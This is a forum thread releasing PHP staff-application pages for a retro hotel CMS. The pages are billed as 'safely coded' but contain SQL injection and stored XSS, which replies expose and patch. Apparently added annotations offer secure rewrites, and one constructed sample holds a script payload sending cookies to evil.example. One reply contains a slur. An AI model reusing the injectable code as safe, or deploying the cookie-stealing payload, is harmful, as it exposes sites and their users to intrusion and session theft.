-
[PHPretro]Staff apps V3.1[safely coded]
Well, hello RZ. Staff apps v3 by me wasn't really safely coded, so here it is: V3.1!
I think you do not need screenies because it is all the same as v3, just re-coded?
OK, staff_apps.start.php:
PHP Code:
<?php
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder |
| Staff Applications V3.1 re-coded by StronGCoder |
+-------------------------------------------------+
| Do not argue in the thread , this is a release |
\*-----------------------------------------------*/
require_once('./includes/core.php');
require_once('./includes/session.php');
$data = new me_sql;
$lang->addLocale("home.me");
$page['id'] = "appsv3";
$page['name'] = "Staff Applications V3";
$page['bodyid'] = "";
$page['cat'] = "community";
require_once('./templates/community_header.php');
?>
<div id="container">
<div id="content">
<div id="column1" class="column">
<div class="habblet-container ">
<div class="cbb clearfix pixellightblue ">
<h2 class="title">Staff Applications</h2>
<!-- posts to the handler file given below, staff_apps.done.php -->
<form action="staff_apps.done.php" method="post">
<img src="http://www.habborator.org/badges/badges/ADM.gif" align="left"><img src="http://www.habborator.org/badges/badges/ADM.gif" align="right">
<br><center><b>Name</b><br>
<input type="text" name="name">
<br><br>
<b>Username</b><br>
<input type="text" name="username"><br>
<br>
<b>Age</b><br>
<input type="number" name="age"><br>
<br>
<b>Email</b><br>
<input type="email" name="email"><br><br>
<b>I am applying for ...</b><br>
<input type="text" name="rank"><br>
<br>
<b>Country</b><br>
<input type="text" name="country"><br><br>
<b>Users you can bring on?</b><br>
<input type="number" name="users_can_bring_on"><br><br>
<b>Why do you want to join the team?</b>
<textarea rows="5" cols="50" name="why_u_want_join"></textarea><br><br>
<b>What can you improve?</b>
<textarea rows="5" cols="50" name="improve"></textarea>
<br><br>
<input type="submit" value="Submit">
</center>
</form>
</div></div></div>
<div id="column2" class="column">
<div class="habblet-container ">
<div class="cbb clearfix pixeldarkblue ">
<h2 class="title">Did I get in?</h2>
<center>We wish you the best of luck with your application. We will alert you in the hotel, on the site or by email if you get in.<br>Thank you for using our form.</center>
</div></div></div>
<?php require_once('./templates/community_footer.php'); ?>
staff_apps.done.php:
PHP Code:
<?php
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder |
| Staff Applications V3.1 re-coded by StronGCoder |
+-------------------------------------------------+
| Do not argue in the thread , this is a release |
\*-----------------------------------------------*/
require_once('./includes/core.php');
require_once('./includes/session.php');
$data = new me_sql;
$lang->addLocale("home.me");
$page['id'] = "appsv3";
$page['name'] = "Staff Applications V3";
$page['bodyid'] = "";
$page['cat'] = "community";
require_once('./templates/community_header.php');
// Here's the query. Every $_POST value is dropped straight into the SQL
// string, unescaped and unvalidated: this is the injection the replies
// below point out (a single quote in any field changes the statement).
$sql = "INSERT INTO staff_applications_v3 (name, username, age, email, applyfor, country, users_can_bring, why_u_want_join, improve)
VALUES
('$_POST[name]','$_POST[username]','$_POST[age]','$_POST[email]','$_POST[rank]','$_POST[country]','$_POST[users_can_bring_on]','$_POST[why_u_want_join]','$_POST[improve]')";
mysql_query($sql);
?>
<div id="container">
<div id="content">
<div id="column1" class="column">
<div class="habblet-container ">
<div class="cbb clearfix pixellightblue ">
<h2 class="title">Sent</h2>
<center>Your application at <?php echo SHORTNAME; ?> hotel has been sent successfully. Please check back later; we will alert you by email, on the site or in the hotel if you got your rank.</center>
</div></div></div>
<?php require_once('./templates/community_footer.php'); ?>
Insert this into your database:
PHP Code:
CREATE TABLE staff_applications_v3
(
name varchar(1000),
username varchar(1000),
age int,
email varchar(1000),
applyfor varchar(1000),
country varchar(1000),
users_can_bring int,
why_u_want_join varchar(10000),
improve varchar(10000)
);
Goes in the housekeeping folder as appsv3.php:
PHP Code:
<?php
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder |
| Staff Applications V3.1 re-coded by StronGCoder |
+-------------------------------------------------+
| Do not argue in the thread , this is a release |
\*-----------------------------------------------*/
$page['dir'] = '\housekeeping';
$page['housekeeping'] = true;
$page['rank'] = 6; // changed rank to moderator
require_once('../includes/core.php');
require_once('./includes/hksession.php');
$lang->addLocale("housekeeping.bans");
$data = new housekeeping_sql;
$page['name'] = "Staff Applications V3";
$page['category'] = "users";
require_once('./templates/housekeeping_header.php');
?>
<body>
<?php
$result = mysql_query("SELECT * FROM staff_applications_v3");
// One stylesheet for the whole table (the original repeated it for every row,
// with a red border rule immediately overridden by the black one).
echo "<style type=\"text/css\">
table, td, th { border: 1px solid black; }
th { background-color: white; color: black; }
h1 { background-color: white; }
</style>
<table border='1'>
<tr>
<th>Name</th>
<th>Username</th>
<th>Age</th>
<th>Email</th>
<th>Applying for ...</th>
<th>Country</th>
<th>Users can bring on:</th>
<th>Wants to join the team because:</th>
<th>Can improve these things:</th>
</tr>";
while ($row = mysql_fetch_array($result))
{
// Values go from the database into the page without HTML escaping, so
// whatever an applicant typed into the form (including <script> tags,
// as a reply below notes) is rendered as markup for the staff member.
echo "<tr>";
echo "<td>" . $row['name'] . "</td>";
echo "<td>" . $row['username'] . "</td>";
echo "<td>" . $row['age'] . "</td>";
echo "<td>" . $row['email'] . "</td>";
echo "<td>" . $row['applyfor'] . "</td>";
echo "<td>" . $row['country'] . "</td>";
echo "<td>" . $row['users_can_bring'] . "</td>";
echo "<td>" . $row['why_u_want_join'] . "</td>";
echo "<td>" . $row['improve'] . "</td>";
echo "</tr>";
}
echo "</table>";
// The connection is opened by core.php, which owns closing it; the original
// called mysql_close($con) on a $con that was never defined here.
?>
</body>
</html>
<?php require_once('./templates/housekeeping_footer.php'); ?>
My old account was StronGCoder, so this is coded by me, and also re-coded, so credits go to me and Yifan Lu.
Please do not comment saying "this is all the same". Yeah, this is all the same, but now your hotel will be protected using this and your SQL won't be public.
Thanks!
StronGCoder :rolleyes:
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Screen please...
but it looks nice ;)
Grr..
Arnii
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Yeah, any screens?
And I thought the v3 version was the last release? :o
-
Re: [PHPretro]Staff apps V3.1[safely coded]
If you can read: "I think you do not need screenies because it is all the same as v3, just re-coded?" It's all the same as V3, the file just got rid of SQL injections (protected)!
Yeah, this is all the same, just re-coded (protected).
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Quote:
Originally Posted by
StrongFaith
If you can read: "I think you do not need screenies because it is all the same as v3, just re-coded?" It's all the same as V3, the file just got rid of SQL injections (protected)!
Yeah, this is all the same, just re-coded (protected).
I want a screen!
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Okay, let me eat, then I'll take it!
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Attachment 82689
Here it is. It's not ALL the same as this: it has a staff badge image and not these colours. That's because I changed it a bit for my hotel!
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Call this secure? Don't you just want to add strip_tags($_POST['name']);
to block <b>, <marquee> and <script> tags :D
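The stored-XSS side of this thread, as an added example that is not code from the original post or from PHPRetro: the housekeeping page above echoes each database value straight into the table, and the reply above proposes strip_tags() on the form input. The context-correct fix is to escape at the point of output, which is what this does. The sample row is constructed; `h()`, `ROW_COLUMNS` and `renderApplicationRow()` are names introduced here, not part of the CMS.

```php
<?php
// Added example, not code from the original post or from PHPRetro:
// one row of the housekeeping table with every cell HTML-escaped on output.
declare(strict_types=1);

/** Escape a value for an HTML text node or a double-quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Columns of staff_applications_v3 in the order the housekeeping table prints them. */
const ROW_COLUMNS = [
    'name', 'username', 'age', 'email', 'applyfor', 'country',
    'users_can_bring', 'why_u_want_join', 'improve',
];

/** Build the <tr> for one fetched row; replaces the raw echo chain in appsv3.php. */
function renderApplicationRow(array $row): string
{
    $cells = '';
    foreach (ROW_COLUMNS as $column) {
        $cells .= '<td>' . h((string)($row[$column] ?? '')) . '</td>';
    }
    return '<tr>' . $cells . "</tr>\n";
}

// Constructed sample row (stands in for one mysql_fetch_array() result):
// an applicant who typed a script tag into the "improve" textarea and a
// quote into "name".
$sample = [
    'name'            => "O'Brien",
    'username'        => 'obrien',
    'age'             => 17,
    'email'           => 'o@example.com',
    'applyfor'        => 'Moderator',
    'country'         => 'IE',
    'users_can_bring' => 3,
    'why_u_want_join' => 'I like helping',
    'improve'         => '<script>new Image().src="http://evil.example/?c="+document.cookie</script>',
];

echo renderApplicationRow($sample);
// The script tag reaches the browser as &lt;script&gt;...&lt;/script&gt; and is
// shown as text; the staff member's session cookie stays where it is.
```

Inside the housekeeping while loop, `echo renderApplicationRow($row);` replaces the nine raw echoes. Escaping on output also covers rows stored before any filter existed and leaves the stored text intact, whereas strip_tags() on the way in alters what is saved and protects only the one place that was thought of.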
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Provide a screenie please?
-
Re: [PHPretro]Staff apps V3.1[safely coded]
There is one..
http://forum.ragezone.com/attachment...d-untitled.png
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Thanks, taking a look now
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Strong, YOU'RE SO PATHETIC. EVERY THEME I USE, YOU COPY IT. LIKE, GIVE IT UP. YOU WILL NEVER BE LIKE ME. YEAH, I SAID IT: YOU ALWAYS COPY MY THEME. I USED THE BLUE, YOU COPY; THE HC, YOU COPY. AND THE PAGE IS BEAT UP. Sorry for the flame, RZ. And FYI this is still exploitable; you can't code safely, can you... 2/10
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Quote:
Originally Posted by
GrandCoder
Strong, YOU'RE SO PATHETIC. EVERY THEME I USE, YOU COPY IT. LIKE, GIVE IT UP. YOU WILL NEVER BE LIKE ME. YEAH, I SAID IT: YOU ALWAYS COPY MY THEME. I USED THE BLUE, YOU COPY; THE HC, YOU COPY. AND THE PAGE IS BEAT UP. Sorry for the flame, RZ. And FYI this is still exploitable; you can't code safely, can you... 2/10
So True.
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Your opinions! You're changing your words, Grand, every time we fight on MSN..
I didn't copy you, I liked it, and I did it! What's your problem, mate?
-
Re: [PHPretro]Staff apps V3.1[safely coded]
EXPLOITS EXPLOITS EXPLOITS!!!
I would 100% definitely not use this script - I can see an SQL injection in the first friggin' line.
DO NOT USE IT.
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Quote:
Originally Posted by
Andrew
EXPLOITS EXPLOITS EXPLOITS!!!
I would 100% definitely not use this script - I can see an SQL injection in the first friggin' line.
DO NOT USE IT.
I'm surprised you would call him out like that.. You could have simply PM'd him and shown him the code.. instead of doing what you just did.
Thanks for the info though
-
Re: [PHPretro]Staff apps V3.1[safely coded]
He and GrandCoder are always fighting like faggots.
Both of you need to hop off RaGEZONE.
-
Re: [PHPretro]Staff apps V3.1[safely coded]
This exploited my CMS when I was hosting a hotel on my computer. Anyone can tell it has exploits.
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Well, since this is not secured, lol. I was gonna use it but never mind, I don't want my hotel to be fucked.
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Quote:
Originally Posted by
Shacobesaurus™
I'm surprised you would call him out like that.. You could have simply PM'd him and shown him the code.. instead of doing what you just did.
Thanks for the info though
Yeah, good idea: maybe I should tell him and not anyone else, so he or others could use this script to exploit hotels, and then everyone would be pissed off.
If you want, I can patch this and re-release.
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Please do so Andrew, it's what you should have done in the first place :S:
-
Re: [PHPretro]Staff apps V3.1[safely coded]
Replace your staff_apps.done.php with this:
Haven't tested it, but it should work.
Code:
<?php
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder |
| Staff Applications V3.1 re-coded by StronGCoder |
|-------------------------------------------------|
| Patched the exploits and re-leased by Andrew |
| of www.ForceHotel.com and www.Elite-DEV.com |
+-------------------------------------------------+
| Do not argue in the thread , this is a release |
\*-----------------------------------------------*/
require_once('./includes/core.php');
require_once('./includes/session.php');
$data = new me_sql;
$lang->addLocale("home.me");
$page['id'] = "appsv3";
$page['name'] = "Staff Applications V3";
$page['bodyid'] = "";
$page['cat'] = "community";
require_once('./templates/community_header.php');
// COMPLETELY REWRITTEN.
$error = "";
// get the vars, each passed through the CMS input filter before it goes near SQL
if (!empty($_POST['name']))
{
$name = $input->FilterText($_POST['name']);
$username = $input->FilterText($_POST['username']);
$age = $input->FilterText($_POST['age']);
$email = $input->FilterText($_POST['email']);
$rank = $input->FilterText($_POST['rank']);
$country = $input->FilterText($_POST['country']);
$users2 = $input->FilterText($_POST['users_can_bring_on']);
$why = $input->FilterText($_POST['why_u_want_join']);
$improve = $input->FilterText($_POST['improve']);
// check for empties?
if (empty($name) || empty($username) || empty($age) || empty($email) || empty($rank) || empty($country) || empty($users2) || empty($why) || empty($improve))
{
$error = "Please fill in all the fields!";
}
if (empty($error))
{
// every value is quoted, $users2 included
$db->query("INSERT INTO staff_applications_v3 (name, username, age, email, applyfor, country, users_can_bring, why_u_want_join, improve) VALUES ('$name', '$username', '$age', '$email', '$rank', '$country', '$users2', '$why', '$improve')");
}
}
else
{
// nothing was posted (the page was opened directly), so do not claim success
$error = "Please fill in all the fields!";
}
?>
<div id="container">
<div id="content">
<div id="column1" class="column">
<div class="habblet-container ">
<div class="cbb clearfix pixellightblue ">
<h2 class="title">Sent</span>
</h2>
<center><?php if (empty($error)) { ?> Your application at <?php echo SHORTNAME; ?> hotel has been sent successfully. Please check back later; we will alert you by email, on the site or in the hotel if you got your rank. <?php } else { echo $error; } ?></center>
</div></div></div>
<?php require_once('./templates/community_footer.php'); ?>
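The INSERT in the original staff_apps.done.php interpolates raw $_POST values into the SQL string, and Andrew's patch above keeps the same string-building approach, relying on the CMS's FilterText() to escape each value first. As an added example (not code from the original post, from Andrew's patch or from PHPRetro), here is the same insert done with input validation and a PDO prepared statement, so the values are sent separately from the SQL text and no escaping step can be forgotten. The DB_* constants, the PDO handle and the function names are assumptions made for this example; the page's own code uses the mysql extension through core.php and shows no PDO connection.

```php
<?php
// Added example, not code from the original post, from Andrew's patch or from
// PHPRetro: the staff_apps.done.php INSERT with validation and a prepared
// statement. DB_DSN/DB_USER/DB_PASS, the PDO handle and the function names
// are assumptions made for this example.
declare(strict_types=1);

const DB_DSN  = 'mysql:host=localhost;dbname=hotel;charset=utf8mb4'; // assumed
const DB_USER = 'hotel';                                            // assumed
const DB_PASS = 'secret';                                           // assumed

// Form field name => column in staff_applications_v3 (from the CREATE TABLE above).
const APP_FIELDS = [
    'name'               => 'name',
    'username'           => 'username',
    'age'                => 'age',
    'email'              => 'email',
    'rank'               => 'applyfor',
    'country'            => 'country',
    'users_can_bring_on' => 'users_can_bring',
    'why_u_want_join'    => 'why_u_want_join',
    'improve'            => 'improve',
];

/**
 * Validate the posted form. Returns [clean, errors]: clean is keyed by column
 * name and is only populated when errors is empty.
 */
function validateApplication(array $post): array
{
    $errors = [];
    $clean  = [];
    foreach (APP_FIELDS as $field => $column) {
        $value = trim((string)($post[$field] ?? ''));
        if ($value === '') {
            $errors[] = "Please fill in the $field field.";
            continue;
        }
        switch ($column) {
            case 'age':
            case 'users_can_bring':
                // INT columns: accept only a short run of digits, store as int.
                if (!preg_match('/^\d{1,3}\z/', $value)) {
                    $errors[] = "$field must be a whole number.";
                    continue 2;
                }
                $clean[$column] = (int)$value;
                break;
            case 'email':
                if (filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
                    $errors[] = 'Please enter a valid email address.';
                    continue 2;
                }
                $clean[$column] = $value;
                break;
            default:
                // Cap at the varchar size from the CREATE TABLE (mbstring assumed).
                $max = in_array($column, ['why_u_want_join', 'improve'], true) ? 10000 : 1000;
                $clean[$column] = mb_substr($value, 0, $max);
        }
    }
    return [$errors ? [] : $clean, $errors];
}

/**
 * Insert with bound parameters. The values travel separately from the SQL
 * text, so a quote in any field (O'Brien, or ' OR '1'='1) is stored as data
 * instead of rewriting the statement.
 */
function insertApplication(PDO $pdo, array $clean): bool
{
    $stmt = $pdo->prepare(
        'INSERT INTO staff_applications_v3
           (name, username, age, email, applyfor, country,
            users_can_bring, why_u_want_join, improve)
         VALUES
           (:name, :username, :age, :email, :applyfor, :country,
            :users_can_bring, :why_u_want_join, :improve)'
    );
    foreach ($clean as $column => $value) {
        $stmt->bindValue(':' . $column, $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    return $stmt->execute();
}

// Handler body for staff_apps.done.php, after the core/session includes.
[$clean, $errors] = validateApplication($_POST);
if (!$errors) {
    $pdo = new PDO(DB_DSN, DB_USER, DB_PASS, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares, not client-side quoting
    ]);
    insertApplication($pdo, $clean);
}
// $errors is what the "Sent" page should print instead of the success text.
```

With emulated prepares switched off, MySQL receives the statement and the nine values as separate protocol messages, so the result does not depend on which characters an escaping function happens to handle. The integer check also closes the gap Andrew's version leaves open for the two INT columns, which it quotes as strings and never validates.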
-
Re: [PHPretro]Staff apps V3.1[safely coded]
This looks similar to the other PHPretro staff apps thing..
Make the system more unique instead of just modifying it..